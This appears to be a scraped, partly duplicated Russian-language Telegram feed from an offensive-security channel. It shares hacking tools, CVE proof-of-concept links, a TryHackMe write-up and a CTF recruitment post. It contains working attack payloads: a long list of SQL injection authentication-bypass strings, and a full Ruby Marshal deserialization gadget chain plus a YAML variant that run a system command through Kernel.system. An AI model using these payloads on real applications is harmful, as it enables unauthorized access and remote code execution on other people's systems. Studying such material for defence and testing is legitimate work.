CrackerJack
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
❤4
SQL injection auth bypass list
or 1=1#sqli
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
🐳6👍1💯1
Forwarded from Monkey Hacker
Ruby Insecure Deserialization
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
# RU
Более подробно можно узнать здесь
# EN
Learn more here
# RU
Есть еще тулза
# EN
There is also a tool
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
require 'base64'
Gem::SpecFetcher
Gem::Installer
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)# RU
Более подробно можно узнать здесь
# EN
Learn more here
https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.htmlhttps://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_ruby.htmlhttps://bishopfox.com/blog/ruby-vulnerabilities-exploits# RU
Есть еще тулза
# EN
There is also a tool
https://github.com/klezVirus/deser-ruby👍6
CVE-2023-24055 PoC KeePass 2.5x
Злоумышленник, имеющий доступ на запись к конфигурационному файлу KeePass, может изменить его и внедрить вредоносные триггеры, например, для получения паролей в открытом виде путем добавления триггера экспорта.
#CVE
Злоумышленник, имеющий доступ на запись к конфигурационному файлу KeePass, может изменить его и внедрить вредоносные триггеры, например, для получения паролей в открытом виде путем добавления триггера экспорта.
#CVE
😱3
💥CVE-2022-44268 ImageMagick Arbitrary Local File Read
💥CVE-2022-44268 ImageMagick Arbitrary File Read PoC
💥CVE-2022-44268 Arbitrary File Read PoC - PNG generator
💥Payload generator and extractor for CVE-2022-44268 written in Python
💥cve-2022-44268-detector - detect malicious PNGs
💥CVE-2022-44268 ImageMagick Arbitrary File Read PoC
💥CVE-2022-44268 Arbitrary File Read PoC - PNG generator
💥Payload generator and extractor for CVE-2022-44268 written in Python
💥cve-2022-44268-detector - detect malicious PNGs
by PrivateShizoGitHub
GitHub - y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment: The vulnerable recurrence docker environment for…
The vulnerable recurrence docker environment for CVE-2022-44268 - y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment
WAF глазами хакеров
Привет, Хабр! Сегодня мы поговорим об одном из современных механизмов защиты веб-приложений, а именно о WAF, Web Application Firewall. Мы расскажем, на чем основываются и как работают современные WAF, какие существуют способы обхода и bypass-техники, как их применять, а также почему ни в коем случае не стоит всецело полагаться на WAF. Мы представим свой взгляд пентестеров, которые никогда не принимали участие в разработке WAF и которые собирали информацию из открытых источников и на основе своего опыта, поэтому о некоторых тонкостях работы WAF мы можем даже и не подозревать.
#WAF
Привет, Хабр! Сегодня мы поговорим об одном из современных механизмов защиты веб-приложений, а именно о WAF, Web Application Firewall. Мы расскажем, на чем основываются и как работают современные WAF, какие существуют способы обхода и bypass-техники, как их применять, а также почему ни в коем случае не стоит всецело полагаться на WAF. Мы представим свой взгляд пентестеров, которые никогда не принимали участие в разработке WAF и которые собирали информацию из открытых источников и на основе своего опыта, поэтому о некоторых тонкостях работы WAF мы можем даже и не подозревать.
#WAF
Доброго времени суток. Объявление для любителей CTF. В команду RedHazzarTeam требуются игроки, владеющие навыками решения задач по направлениям rev/pwn/crypto. Молодая динамически развивающаяся команда, с амбициозными планами. Входим в топ-20 команд в РФ. Основной критерий: владение базовыми навыками по указанным направлениям, активное участие в жизни коллектива, большое желание развиваться в ИБ и помогать другим. По всем вопросам пишите в лс, буду рад пообщаться и ответить на Ваши вопросы.
(Контакт для связи: @Hazzarim139)
(Контакт для связи: @Hazzarim139)
Forwarded from Monkey Hacker
Ruby Deserialization via YAML file
# RU
Тут не будет каких-то подробностей, считайте дополнение к прошлому посту
Сама команда выполняется в
Т. е сам YAML файл выглядит так
# EN
There won't be any details, just consider it an addition to the previous post
The command itself is executed in
That is, the YAML file itself looks like this
# RU
А содержимое ruby скрипта будет таким
# EN
And the contents of the ruby script will be
# RU
И потом делаем
# EN
And then do
# RU
Да там будут ошибки, однако наша команда будет выполняться.
# EN
Yes, there will be mistakes, but our command will be executed.
THX:
# RU
Тут не будет каких-то подробностей, считайте дополнение к прошлому посту
Сама команда выполняется в
git_setТ. е сам YAML файл выглядит так
# EN
There won't be any details, just consider it an addition to the previous post
The command itself is executed in
git_setThat is, the YAML file itself looks like this
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve# RU
А содержимое ruby скрипта будет таким
# EN
And the contents of the ruby script will be
require "yaml"
YAML.load(File.read("payload.yml"))# RU
И потом делаем
# EN
And then do
ruby deser.rb# RU
Да там будут ошибки, однако наша команда будет выполняться.
# EN
Yes, there will be mistakes, but our command will be executed.
THX:
https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/👍5
Forwarded from RESOLUTE ATTACK
Небезопасная десериализация
Всем привет! С вами wr3dmast3r, и сегодня я познакомлю вас с интересной уязвимостью, связанной с небезопасной десериализацией данных
Читать
Всем привет! С вами wr3dmast3r, и сегодня я познакомлю вас с интересной уязвимостью, связанной с небезопасной десериализацией данных
Читать
Telegraph
Insecure deserialization
Всем привет! С вами wr3dmast3r, и сегодня я познакомлю вас с интересной уязвимостью, связанной с небезопасной десериализацией данных. Данная уязвимость крайне интересна в контексте внешнего пентеста, и она должна быть в голове у каждого начинающего специалиста.…
👍5
THM WriteUP | Mustacchio
На Codeby вышла очередная моя статья, в этот раз прохождение лабы на TryHackMe.
Всем привет! Недавно начал писать прохождения различных тачек на TryHackMe на английском языке, теперь буду писать и на русском. В этот раз я буду решать Mustacchio. У него теги: XXE, PrivEsc.
Если вам будет интересен глубокий разбор XXE - фидбекайте в комментах и сделаю его!
На Codeby вышла очередная моя статья, в этот раз прохождение лабы на TryHackMe.
Всем привет! Недавно начал писать прохождения различных тачек на TryHackMe на английском языке, теперь буду писать и на русском. В этот раз я буду решать Mustacchio. У него теги: XXE, PrivEsc.
Если вам будет интересен глубокий разбор XXE - фидбекайте в комментах и сделаю его!
🔥7
Forwarded from Эксплойт
This media is not supported in your browser
VIEW IN TELEGRAM
Сбер выпустил необычное поздравление с Днем защитника Отечества — с помощью технологий дополненной реальности компания поблагодарила всех мужчин за их каждодневный труд и заботу.
Официально, самое красивое поздравление сегодня.
@exploitex
Официально, самое красивое поздравление сегодня.
@exploitex
🔥10🤣2👍1
Fortinet FortiNAC Unauthenticated RCE
В четверг, 16 февраля 2023 года, компания Fortinet выпустила PSIRT, в котором подробно описана CVE-2022-39952, критическая уязвимость, затрагивающая ее продукт FortiNAC. Эта уязвимость, обнаруженная Gwendal Guégniaud из Fortinet, позволяет не аутентифицированному злоумышленнику записать произвольные файлы в системе и в результате получить RCE от root'а.
#fortinet #CVE #POC
В четверг, 16 февраля 2023 года, компания Fortinet выпустила PSIRT, в котором подробно описана CVE-2022-39952, критическая уязвимость, затрагивающая ее продукт FortiNAC. Эта уязвимость, обнаруженная Gwendal Guégniaud из Fortinet, позволяет не аутентифицированному злоумышленнику записать произвольные файлы в системе и в результате получить RCE от root'а.
#fortinet #CVE #POC
Обращение к пентестерам/ресерчерам по мобилкам. Если такие есть здесь. Накидайте пожалуйста непопулярного полезного материала, может даже ваши советы или лайфхаки. Любым конструктивным советам буду рад!
Похек
Разбор уязвимости LocalPotato CVE-2023-21746 на русском языке! LocalPotato CVE-2023-21746 Windows LPE После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное…
Свежая тачка по уязвимости LocalPotato. Советую прочитать мой анализ этой уязвимости для более глубокого анализа.
https://tryhackme.com/room/localpotato
#thm #cve
https://tryhackme.com/room/localpotato
#thm #cve
TryHackMe
LocalPotato
Learn how to elevate your privileges on Windows using LocalPotato (CVE-2023-21746).
Vulmap
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools